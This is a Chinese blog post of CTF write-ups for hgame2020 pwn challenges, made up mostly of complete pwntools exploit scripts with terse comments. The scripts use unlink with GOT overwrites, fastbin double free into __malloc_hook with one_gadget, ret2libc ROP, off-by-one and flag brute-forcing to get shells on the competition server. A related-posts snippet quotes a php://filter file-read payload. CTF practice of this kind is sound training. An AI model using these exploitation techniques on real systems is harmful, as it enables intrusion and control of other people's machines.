hg2020 pwn

最新推荐文章于 2023-01-15 04:00:00 发布
最新推荐文章于 2023-01-15 04:00:00 发布
阅读量487 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/104468718
版权

打了我就记录一下
(有点记不太清了有点久了~~)

Annevi

这道题是做2次unlink然后写got表即可

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./Annevi')
	elf=ELF('./Annevi')
	libc=elf.libc
else:
	p=remote('47.103.214.163',20301)
	elf=ELF('./Annevi')
	libc=elf.libc

def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('?',str(size))
	p.sendlineafter('content:',content)

def delete(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('index?',str(idx))

def show(idx):
	p.sendlineafter(':','3')
	p.sendlineafter('index?',str(idx))

def edit(idx,content):
	p.sendlineafter(':','4')
	p.sendlineafter('index?',str(idx))
	p.sendlineafter('content:',content)

def exp():
	add(0x90,'aaaa')#0
	add(0x90,'aaaa')#1
	add(0x90,'bbbb')#2
	add(0x90,'/bin/sh\x00')#3
	add(0x90,'/bin/sh\x00')#4
	payload=p64(0)+p64(0x91)+p64(0x602040-0x18)+p64(0x602040-0x10)+'a'*0x70+p64(0x90)+p64(0xa0)
	edit(0,payload)
	delete(1)
	payload=p64(0)*3+p64(elf.got['atoi'])
	edit(0,payload)
	show(0)
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['atoi']
	system=libcbase+libc.sym['system']
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	free_hook=libcbase+libc.sym['__free_hook']
	one_gadget=libcbase+0xf1147
	log.success('libcbase: '+hex(libcbase))
	payload=p64(0)+p64(0x91)+p64(0x602050-0x18)+p64(0x602050-0x10)+'a'*0x70+p64(0x90)+p64(0xa0)
	edit(2,payload)
	delete(3)
	payload=p64(0)+p64(free_hook)
	edit(2,payload)
	edit(0,p64(system))
	show(0)
	p.interactive()

if __name__=="__main__":
	exp()

Another_Heaven

截断爆破我记得用了好久

from pwn import *
#p=process('./Another_Heaven')
for j in range(97,127):
	p=remote('47.103.214.163',21001)
	p.recvuntil('!"')
	payload=str(0x602160+43)
	p.sendline(payload)
	sleep(0.2)
	p.send('\x00')
	p.recvuntil(':')
	p.sendline('E99p1ant')
	p.recvuntil(':')
	payload='hgame{VGhlX2Fub3RoZXJfd2F5X3RvX2hlYXZlbg=='
	payload=payload+chr(j)
	p.sendline(payload)
	replay=p.recv()
	if 'Welcome' in replay:
		print "yes!!!"+payload
		break
	#p.interactive()
print payload
#hgame{VGh

Hard_AAAAA

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./Hard_AAAAA')
	elf=ELF('./Hard_AAAAA')
else:
	p=remote('47.103.214.163',20000)

def exp():
	p.recvuntil('!')
	payload='a'*(0xac-0x31)+'0O0o\x00O0'
	p.sendline(payload)
	p.interactive()

if __name__=="__main__":
	exp()

One_Shot

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./One_Shot')
else:
	p=remote('47.103.214.163',20002)
def exp():
	p.recvuntil('?')
	payload='a'*0x20
	p.sendline(payload)
	p.recvuntil('shot!')
	p.sendline(str(0x06010E0))
	p.interactive()

if __name__=="__main__":
	exp()

ROP_LEVEL0

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./ROP_LEVEL0')
	elf=ELF('./ROP_LEVEL0')
	libc=elf.libc

else:
	p=remote('47.103.214.163',20003)
	elf=ELF('./ROP_LEVEL0')
	libc=elf.libc

def exp():
	pop_rdi=0x400753
	p.recvuntil('./flag')
	payload='a'*0x50+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40065B)
	p.send(payload)
	put=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	libcbase=put-libc.sym['puts']
	system=libcbase+libc.sym['system']
	bin_sh=libcbase+libc.search('/bin/sh').next()
	p.recvuntil('./flag')
	payload='a'*0x50+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(0)
	p.send(payload)
	p.interactive()

if __name__=="__main__":
	exp()

Roc826

先改指针leak然后正常打malloc_hook

#!/usr/bin/python2
from pwn import *
local=1
if local==1:
	p=process('./Roc826')
	elf=ELF('./Roc826')
	libc=elf.libc
else:
	p=remote('47.103.214.163',21002)
	elf=ELF('./Roc826')
	libc=elf.libc

def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('size?',str(size))
	p.sendlineafter('content:',content)

def delete(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('index?',str(idx))

def show(idx):
	p.sendlineafter(':','3')
	p.sendlineafter('index?',str(idx))

lg=lambda address,data:log.success('%s: '%(address)+hex(data))

def exp():
	add(0x50,'doudou0') #0
	add(0x40,'douodu1') #1
	add(0x40,'doudou5') #2
	add(0x68,'doudou2') #3
	add(0x68,'doudou3') #4
	add(0x18,'doudou4') #5
	delete(3)
	delete(4)
	delete(3)
	add(0x68,p64(0x60208d))
	add(0x68,'dd0')
	add(0x68,'dd1')
	add(0x60,p64(0)*2+'\xaa\xaa\xaa'+p64(elf.got['puts']))
	show(2)
	put=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	libcbase=put-libc.sym['puts']
	o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	one_gadget=libcbase+o_g[3]
	lg('libcbase',libcbase)
	delete(6)
	delete(7)
	delete(6)
	add(0x68,p64(malloc_hook-0x23))
	add(0x68,'su')
	add(0x68,'su1')
	add(0x68,'a'*19+p64(one_gadget))
	show(8)
	p.sendlineafter(':','1')
	p.sendlineafter('size?',str(1))
	p.interactive()
if __name__=="__main__":
	exp()

E99

off by one 写入的时加个换行-_-
exp:

#!/usr/bin/python2
from pwn import *
local=1
if local==1:
	p=process('./E99')
	elf=ELF('./E99')
	libc=elf.libc
else:
	p=remote('1',1)
	elf=ELF('./E99')
	libc=elf.libc

def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('?',str(size))
	p.sendlineafter('content:',content)

def delete(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('index?',str(idx))

def show(idx):
	p.sendlineafter(':','3')
	p.sendlineafter('index?',str(idx))

def edit(idx,content):
	p.sendlineafter(':','4')
	p.sendlineafter('index?',str(idx))
	p.sendafter('content:',content)

def exp():
	add(0x18,'a'*0x18)#0
	add(0x28,'aaaa')#1
	add(0x68,'cccc')
	add(0x10,'aaaa')
	#delete(1)
	payload='a'*0x18+'\xa1'
	edit(0,payload)
	delete(1)
	add(0x20,'doudou')
	show(2)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-	  libc.sym['__malloc_hook']-88-0x10
	log.success('libcbase: '+hex(libcbase))
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
	one_gadget=libcbase+o_g[3]
	add(0x60,'doudou')
	delete(2)
	edit(4,p64(malloc_hook-0x23)+'\n')
	add(0x68,'doudou')
	add(0x68,'a'*0x13+p64(one_gadget))
	p.sendlineafter(':','1')
	p.sendlineafter('?',str(1))
	p.interactive()

if __name__=="__main__":
	exp()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道堆方向的pwn(double free & unsorted bins)
F_Day_的博客
10-17 825
一道堆方向的pwn(double free & unsorted bins)做题环境什么是double free 在某博客上看到了一道堆的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
cybrics2021_pwn
令则
07-26 265
cybrics2021_pwn 文章目录cybrics2021_pwngross(done)逆向主程序mainshellprogramsstorage利用little buggy editor逆向利用 膜队友ak rev, syclover今年也很努力! gross(done) 逆向 拿到题目就开始逆向, 简单分析, 程序本身main文件是做了个简易的os, 有程序加载运行的功能, 然后programs文件夹内存放的是几个自定义格式的二进制文件, 程序就直接启动了shell, 然后进入运行. 进行分析,
hgame2022-week1
网安小菜鸡
01-15 4445
hgame2022-week1 wp(部分)
第二届 BJDCTF 2020 Pwn Writeup (出题人版)
HiTaQini
04-01 1916
最为第一届BJDCTF的参赛选手和本届比赛的二进制出题人+运维,真心祝愿BJDCTF越办越好!(说多了怕被打)
hgame2020-week1-re
令则
02-05 543
hgame-week1-re 文章目录hgame-week1-remazebitwise_operation2advancecpp 题目文件: 链接: https://pan.baidu.com/s/1uvsIh8iaYVFq7WmuaYk16w 密码: s87d maze 题目本身提示这是一个迷宫,ida分析就是极为典型的迷宫: 我们看到增减的量会存在两个,4和64, 那么4就是我们的左右...
videolan x265 源代码下载、编译、测试 【2015-8-11】更新链接
cmsbupt的专栏
11-22 2759
目前有多个实现HEVC/H.265/MPEG-H标准的项目叫做x265,本文主要关注 Videolan旗下的x265
PWN
qq_42352315的博客
12-29 935
pwn的一些题目 写给自己看的 1、BUUCTF上面ciscn_2019_c_1这道题,没什么好说的,标准retlibc题目,泄露函数的got表值从而获取libc_base,网上相关方法一堆,直接贴代码 from pwn import * # context(log_level='debug',arch='amd64') p=remote('node3.buuoj.cn',25231) #encrypt方法是为了绕过题目的encrypt加密 def encrypt(s): str1=list(s)
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
几道pwn题复现
weixin_44113469的博客
02-07 466
不记得是什么时候打的比赛,自己搭的博客崩了,搬来csdn记录一下 虎符CTF 复现 0x01 任意地址写 from pwn import* from sys import* p=remote('39.97.210.182',10055)#p=remote()39.97.210.182 10055 #p=process("./chall") elf=ELF('chall') #libc = ELF('libc6_2.27-3ubuntu1_amd64.so') #libc = ELF('./libc-2.23
记一次春节CTF实战练习(RE/PWN)
蚁景网安学院
02-07 1061
这是Hgame_CTF第二周的题目,一共有四周。相对来说,比第一周难(HgameCTF(week1)-RE,PWN题解析)。这次的有一道逆向考点也挺有意思,得深入了解AES的CBC加密模...
利用隐马尔可夫模型(HMM)进行语音情感识别
菜的不行的IT民工
11-25 5305
特别提一下安装hmmlearn库不能直接pip install hmmlearn 安装过程如下: 1. 进入 https://www.lfd.uci.edu/~gohlke/pythonlibs/ ,找到hmmlearn***.whl类型的文件下载(要和自己的python版本相对应)如果你用的是anaconda可以在命令窗口输入conda -activate 进入你的anaconda环境,再输...
pwn真的入门了
萍水间人的小天地
05-01 867
终于沉下心来好好的把ctf-wiki上的pwn部分看了一下(当然菜鸡的我海之看懂了栈) 首先需要补充一下aslr 我们可以通过修改 /proc/sys/kernel/randomize_va_space 来控制 ASLR 启动与否,具体的选项有 0,关闭 ASLR,没有随机化。栈、堆、.so 的基地址每次都相同。 1,普通的 ASLR。栈基地址、mmap 基地址、.so 加载基地...
Nctf2019 pwn
doudoudedi
11-24 687
没啥好说的自己菜 就做了三个 hello_pwn 没啥好说了直接连 from pwn import * local=1 p=remote('139.129.76.65',50003) p.interactive() pwn me 100 years! (Ⅰ) 00截断然后直接覆盖 from pwn import * p=remote('139.129.76.65',50004) #p=proce...
AAAI 2020 Reasoning with Heterogeneous Graph Alignment for Video Question Answering∗
smile909的博客
04-24 643
动机 视频问答(VideoQA)的推理通常涉及两个领域的异构数据,即时空视频内容和语言文字序列。现有的方法主要集中在多模态的表示和融合方面,在对齐和推理方面的研究还很少。 近年来,多模态问答技术取得了显著进展,其中最具代表性的是视觉问答(VQA)和视频问答(VideoQA),其中VideoQA将VQA扩展到视频领域,对时空理解和推理提出了更高的要求。视频问答(VideoQA)旨在自动推理视频和文本问题的正确答案,近年来受到越来越多的关注。VideoQA的推理通常涉及两个领域的异构数据,即时空视频内容和语
xctf ics-05 wp
doudoudedi
06-18 2700
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
ctf.show算力超群
08-15
你好!对于ctf.show的算力表现超群,我了解的有限。ctf.show是一个CTF竞赛平台,为参赛者提供了丰富的题目和挑战,需要进行漏洞利用、密码破解、逆向工程等各种技术方面的攻防对抗。算力在CTF比赛中往往是非常重要的,因为一些题目需要进行高强度的计算或者复杂的加密解密操作。如果ctf.show能够提供出色的算力支持,那么参赛者在解决问题时会更加得心应手,也能够更好地展现自己的技术实力。不过具体关于ctf.show的算力超群的细节和技术实现,我并不清楚。如果你对这方面有更具体的问题,我会尽力回答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值